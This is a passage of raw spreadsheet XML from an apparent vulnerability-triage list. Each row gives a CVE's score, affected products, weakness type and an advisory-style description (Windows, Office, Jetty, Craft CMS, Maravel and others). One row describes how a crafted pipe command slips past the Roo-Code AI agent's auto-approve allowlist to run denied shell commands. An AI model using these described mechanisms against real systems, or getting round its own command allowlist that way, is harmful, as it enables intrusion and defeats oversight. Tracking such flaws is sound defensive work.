r="A249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C249" s="5" t="inlineStr"><is><t>CVE-2026-80083</t></is></c><c r="D249" s="5" t="n"><v>8.800000000000001</v></c><c r="E249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G249" s="5" t="inlineStr" /><c r="H249" s="5" t="n"><v>0.002</v></c><c r="I249" s="5" t="inlineStr" /><c r="J249" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K249" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L249" s="5" t="inlineStr" /><c r="M249" s="5" t="inlineStr" /><c r="N249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P249" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q249" s="5" t="inlineStr" /><c r="R249" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S249" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t></is></c></row><row r="250"><c r="A250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C250" s="5" t="inlineStr"><is><t>CVE-2026-80085</t></is></c><c r="D250" s="5" t="n"><v>8.800000000000001</v></c><c r="E250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G250" s="5" t="inlineStr" /><c r="H250" s="5" t="n"><v>0.005</v></c><c r="I250" s="5" t="inlineStr" /><c r="J250" s="5" t="inlineStr" /><c r="K250" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L250" s="5" t="inlineStr" /><c r="M250" s="5" t="inlineStr" /><c r="N250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P250" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q250" s="5" t="inlineStr" /><c r="R250" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S250" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t></is></c></row><row r="251"><c r="A251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C251" s="5" t="inlineStr"><is><t>CVE-2026-80096</t></is></c><c r="D251" s="5" t="n"><v>8.800000000000001</v></c><c r="E251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G251" s="5" t="inlineStr" /><c r="H251" s="5" t="n"><v>0.007</v></c><c r="I251" s="5" t="inlineStr" /><c r="J251" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K25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51" s="5" t="inlineStr" /><c r="M251" s="5" t="inlineStr" /><c r="N251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P251" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q251" s="5" t="inlineStr" /><c r="R251" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S251" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t></is></c></row><row r="252"><c r="A252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C252" s="5" t="inlineStr"><is><t>CVE-2026-81352</t></is></c><c r="D252" s="5" t="n"><v>8.800000000000001</v></c><c r="E252" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G252" s="5" t="inlineStr" /><c r="H252" s="5" t="n"><v>0.005</v></c><c r="I252" s="5" t="inlineStr" /><c r="J252" s="5" t="inlineStr" /><c r="K252" s="5" t="inlineStr" /><c r="L252" s="5" t="inlineStr" /><c r="M252" s="5" t="inlineStr" /><c r="N252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P252" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q252" s="5" t="inlineStr" /><c r="R252" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S252" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t></is></c></row><row r="253"><c r="A253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C253" s="5" t="inlineStr"><is><t>CVE-2026-81385</t></is></c><c r="D253" s="5" t="n"><v>8.800000000000001</v></c><c r="E253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G253" s="5" t="inlineStr" /><c r="H253" s="5" t="n"><v>0.01</v></c><c r="I253" s="5" t="inlineStr" /><c r="J253" s="5" t="inlineStr" /><c r="K253" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L253" s="5" t="inlineStr" /><c r="M253" s="5" t="inlineStr" /><c r="N253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P253" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q253" s="5" t="inlineStr" /><c r="R253" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S253" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t></is></c></row><row r="254"><c r="A254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C254" s="5" t="inlineStr"><is><t>CVE-2026-81952</t></is></c><c r="D254" s="5" t="n"><v>8.800000000000001</v></c><c r="E254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G254" s="5" t="inlineStr" /><c r="H254" s="5" t="n"><v>0.006</v></c><c r="I254" s="5" t="inlineStr" /><c r="J254" s="5" t="inlineStr" /><c r="K254" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L254" s="5" t="inlineStr" /><c r="M254" s="5" t="inlineStr" /><c r="N254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P254" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q254" s="5" t="inlineStr" /><c r="R254" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S254" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t></is></c></row><row r="255"><c r="A255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C255" s="5" t="inlineStr"><is><t>CVE-2026-81955</t></is></c><c r="D255" s="5" t="n"><v>8.800000000000001</v></c><c r="E255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G255" s="5" t="inlineStr" /><c r="H255" s="5" t="n"><v>0.006</v></c><c r="I255" s="5" t="inlineStr" /><c r="J255" s="5" t="inlineStr" /><c r="K255" s="5" t="inlineStr" /><c r="L255" s="5" t="inlineStr" /><c r="M255" s="5" t="inlineStr" /><c r="N255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P255" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q255" s="5" t="inlineStr" /><c r="R255" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S255" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t></is></c></row><row r="256"><c r="A256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C256" s="5" t="inlineStr"><is><t>CVE-2026-81996</t></is></c><c r="D256" s="5" t="n"><v>8.800000000000001</v></c><c r="E256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F256" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G256" s="5" t="inlineStr" /><c r="H256" s="5" t="n"><v>0.001</v></c><c r="I256" s="5" t="inlineStr" /><c r="J256" s="5" t="inlineStr" /><c r="K256" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L256" s="5" t="inlineStr" /><c r="M256" s="5" t="inlineStr" /><c r="N256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P256" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q256" s="5" t="inlineStr" /><c r="R256" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S256" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t></is></c></row><row r="257"><c r="A257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C257" s="5" t="inlineStr"><is><t>CVE-2026-82536</t></is></c><c r="D257" s="5" t="n"><v>8.800000000000001</v></c><c r="E257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G257" s="5" t="inlineStr" /><c r="H257" s="5" t="n"><v>0.003</v></c><c r="I257" s="5" t="inlineStr" /><c r="J257" s="5" t="inlineStr" /><c r="K257" s="5" t="inlineStr" /><c r="L257" s="5" t="inlineStr" /><c r="M257" s="5" t="inlineStr" /><c r="N257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q257" s="5" t="inlineStr" /><c r="R257" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S257" s="5" t="inlineStr"><is><t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t></is></c><c r="T257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t></is></c></row><row r="258"><c r="A258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C258" s="5" t="inlineStr"><is><t>CVE-2026-83941</t></is></c><c r="D258" s="5" t="n"><v>8.800000000000001</v></c><c r="E258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G258" s="5" t="inlineStr" /><c r="H258" s="5" t="n"><v>0.007</v></c><c r="I258" s="5" t="inlineStr" /><c r="J258" s="5" t="inlineStr" /><c r="K258" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L258" s="5" t="inlineStr" /><c r="M258" s="5" t="inlineStr" /><c r="N258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P258" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q258" s="5" t="inlineStr" /><c r="R258" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S258" s="5" t="inlineStr"><is><t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t></is></c></row><row r="259"><c r="A259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C259" s="5" t="inlineStr"><is><t>CVE-2026-83992</t></is></c><c r="D259" s="5" t="n"><v>8.800000000000001</v></c><c r="E259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G259" s="5" t="inlineStr" /><c r="H259" s="5" t="n"><v>0.006</v></c><c r="I259" s="5" t="inlineStr" /><c r="J259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K25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59" s="5" t="inlineStr" /><c r="M259" s="5" t="inlineStr" /><c r="N259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P259" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q259" s="5" t="inlineStr" /><c r="R259" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S259" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t></is></c></row><row r="260"><c r="A260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C260" s="5" t="inlineStr"><is><t>CVE-2026-83996</t></is></c><c r="D260" s="5" t="n"><v>8.800000000000001</v></c><c r="E260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G260" s="5" t="inlineStr" /><c r="H260" s="5" t="n"><v>0.002</v></c><c r="I260" s="5" t="inlineStr" /><c r="J260" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K26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260" s="5" t="inlineStr" /><c r="M260" s="5" t="inlineStr" /><c r="N260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P260" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q260" s="5" t="inlineStr" /><c r="R260" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S260" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t></is></c></row><row r="261"><c r="A261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C261" s="5" t="inlineStr"><is><t>CVE-2026-83998</t></is></c><c r="D261" s="5" t="n"><v>8.800000000000001</v></c><c r="E261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G261" s="5" t="inlineStr" /><c r="H261" s="5" t="n"><v>0.004</v></c><c r="I261" s="5" t="inlineStr" /><c r="J261" s="5" t="inlineStr" /><c r="K261" s="5" t="inlineStr" /><c r="L261" s="5" t="inlineStr" /><c r="M261" s="5" t="inlineStr" /><c r="N261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P261" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q261" s="5" t="inlineStr" /><c r="R261" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S261" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t></is></c></row><row r="262"><c r="A262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C262" s="5" t="inlineStr"><is><t>CVE-2026-85877</t></is></c><c r="D262" s="5" t="n"><v>8.800000000000001</v></c><c r="E262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G262" s="5" t="inlineStr" /><c r="H262" s="5" t="n"><v>0.004</v></c><c r="I262" s="5" t="inlineStr" /><c r="J262" s="5" t="inlineStr" /><c r="K262" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2</t></is></c><c r="L262" s="5" t="inlineStr" /><c r="M262" s="5" t="inlineStr" /><c r="N262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P262" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q262" s="5" t="inlineStr" /><c r="R262" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S262" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t></is></c></row><row r="263"><c r="A263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C263" s="5" t="inlineStr"><is><t>CVE-2026-86076</t></is></c><c r="D263" s="5" t="n"><v>8.800000000000001</v></c><c r="E263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G263" s="5" t="inlineStr" /><c r="H263" s="5" t="n"><v>0.004</v></c><c r="I263" s="5" t="inlineStr" /><c r="J263" s="5" t="inlineStr" /><c r="K263" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L263" s="5" t="inlineStr" /><c r="M263" s="5" t="inlineStr" /><c r="N263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P263" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q263" s="5" t="inlineStr" /><c r="R263" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S263" s="5" t="inlineStr"><is><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is></c><c r="T263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t></is></c></row><row r="264"><c r="A264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C264" s="5" t="inlineStr"><is><t>CVE-2026-86083</t></is></c><c r="D264" s="5" t="n"><v>8.800000000000001</v></c><c r="E264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G264" s="5" t="inlineStr" /><c r="H264" s="5" t="n"><v>0.004</v></c><c r="I264" s="5" t="inlineStr" /><c r="J264" s="5" t="inlineStr" /><c r="K264" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L264" s="5" t="inlineStr" /><c r="M264" s="5" t="inlineStr" /><c r="N264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P264" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q264" s="5" t="inlineStr" /><c r="R264" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S264" s="5" t="inlineStr"><is><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is></c><c r="T264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t></is></c></row><row r="265"><c r="A265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C265" s="5" t="inlineStr"><is><t>CVE-2026-86730</t></is></c><c r="D265" s="5" t="n"><v>8.800000000000001</v></c><c r="E265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G265" s="5" t="inlineStr" /><c r="H265" s="5" t="n"><v>0.004</v></c><c r="I265" s="5" t="inlineStr" /><c r="J265" s="5" t="inlineStr" /><c r="K265" s="5" t="inlineStr" /><c r="L265" s="5" t="inlineStr" /><c r="M265" s="5" t="inlineStr" /><c r="N265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q265" s="5" t="inlineStr" /><c r="R265" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S265" s="5" t="inlineStr"><is><t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t></is></c><c r="T265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t></is></c></row><row r="266"><c r="A266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C266" s="5" t="inlineStr"><is><t>CVE-2026-12611</t></is></c><c r="D266" s="5" t="n"><v>8.699999999999999</v></c><c r="E266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F266" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G266" s="5" t="inlineStr" /><c r="H266" s="5" t="n"><v>0.003</v></c><c r="I266" s="5" t="inlineStr" /><c r="J266" s="5" t="inlineStr" /><c r="K266" s="5" t="inlineStr" /><c r="L266" s="5" t="inlineStr" /><c r="M266" s="5" t="inlineStr" /><c r="N266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P266" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q266" s="5" t="inlineStr" /><c r="R266" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S266" s="5" t="inlineStr"><is><t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.




This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.




The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t></is></c><c r="T266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t></is></c></row><row r="267"><c r="A267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C267" s="5" t="inlineStr"><is><t>CVE-2026-33197</t></is></c><c r="D267" s="5" t="n"><v>8.699999999999999</v></c><c r="E267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F267" s="5" t="inlineStr"><is><t>biossecurity@ami.com</t></is></c><c r="G267" s="5" t="inlineStr" /><c r="H267" s="5" t="n"><v>0.001</v></c><c r="I267" s="5" t="inlineStr" /><c r="J267" s="5" t="inlineStr" /><c r="K267" s="5" t="inlineStr" /><c r="L267" s="5" t="inlineStr" /><c r="M267" s="5" t="inlineStr" /><c r="N267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q267" s="5" t="inlineStr" /><c r="R267" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S267" s="5" t="inlineStr"><is><t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t></is></c><c r="T267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t></is></c></row><row r="268"><c r="A268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C268" s="5" t="inlineStr"><is><t>CVE-2026-55250</t></is></c><c r="D268" s="5" t="n"><v>8.699999999999999</v></c><c r="E268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F268" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G268" s="5" t="inlineStr" /><c r="H268" s="5" t="n"><v>0.006</v></c><c r="I268" s="5" t="inlineStr" /><c r="J268" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K268" s="5" t="inlineStr" /><c r="L268" s="5" t="inlineStr" /><c r="M268" s="5" t="inlineStr" /><c r="N268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P268" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q268" s="5" t="inlineStr" /><c r="R268" s="5" t="inlineStr"><is><t>CWE-294, CWE-613, CWE-672</t></is></c><c r="S268" s="5" t="inlineStr"><is><t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.74.0 has a high-severity Token Replay Vulnerability arising from a structural lifecycle mismatch between stateless token validation engines and high-performance relational caching layers. Any application with low cache memory that causes premature eviction to free up memory and applications running macropay-solutions/maravel-framework that utilize tymon/jwt-auth for API token authentication and blacklist management or any other package that does the same may be affected. This architectural risk might also impact native Laravel applications utilizing cache tags under specific volatile or eviction-capped environments. tymon/jwt-auth automatically probes for cache tag support. If found, it forcefully wraps 14-day token blacklist entries (jti) inside a relational tymon.jwt tag. In environments where the O(1) Atomic Lazy Eviction model is active — either natively inside Maravel-Framework v20.x or manually backported into v10.x via the explicit DI container singletons provided in PR #104 (App\Cache\TaggedCache and App\Cache\TagSet) — a strict global tracking ceiling (Container::TAGGED_CACHE_TTL_CAP_SECONDS) of 7,200 seconds (2 hours) is enforced to secure the system against memory index bloat. This ceiling forcefully truncates the 14-day blacklist lifespan down to a maximum of 2 hours, after which individual tracking keys naturally expire and disappear from the active cache window. Furthermore, because the optimized engine implements a generational version matrix to achieve O(1) flush speeds, any programmatic or manual invocation of a tag flush or reset (e.g., Cache::tags([...])-&gt;flush()) instantly bumps the internal atomic master version pointer. This shifts the computed cryptographic composite hash (sha1($this-&gt;tags-&gt;getNamespace())) for all overlapping components, rendering the entire existing index immediately unreachable. Consequently, through either natural 2-hour expiration or an intervening tag flush execution (like the cache naturally cleaning old values to free up memory), the invalidation state records are entirely wiped out. Because the tokens' physical cryptographic signatures remain structurally valid for up to 14 days, stolen, hijacked, or legitimately logged-out tokens are instantly and silently resurrected across the entire API gateway, leaving the application critically vulnerable to widespread Token Replay Attacks. Because this issue is caused by an upstream architectural assumption within the tymon/jwt-auth package rather than a core defect inside the framework, there is no direct framework version upgrade that can safely bypass this lifecycle collision without breaking business cache recycling bounds. Maravel version 10.74.0 introduced a way to backport the new fixed tagged cache from 20.x into 10.x by resolving TagSet and TaggedCache from DI, which is how this latent architectural lifecycle vulnerability was discovered. Users must apply the decoupled configuration workaround outlined below. As a workaround, make sure that cache memory size does not generate early natural evictions from cache to free up space, deleting blacklisted jwt ids before they expire. Applications must decouple flat authentication vectors from the relational tagging subsystem. This forces token identifiers to write directly to the primary cache keyspace as flat, un-tagged key-value pairs where they securely retain their unclipped 14-day lifecycle.</t></is></c><c r="T268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t></is></c></row><row r="269"><c r="A269" s="5" t="inlineStr"><is><t>P3 - 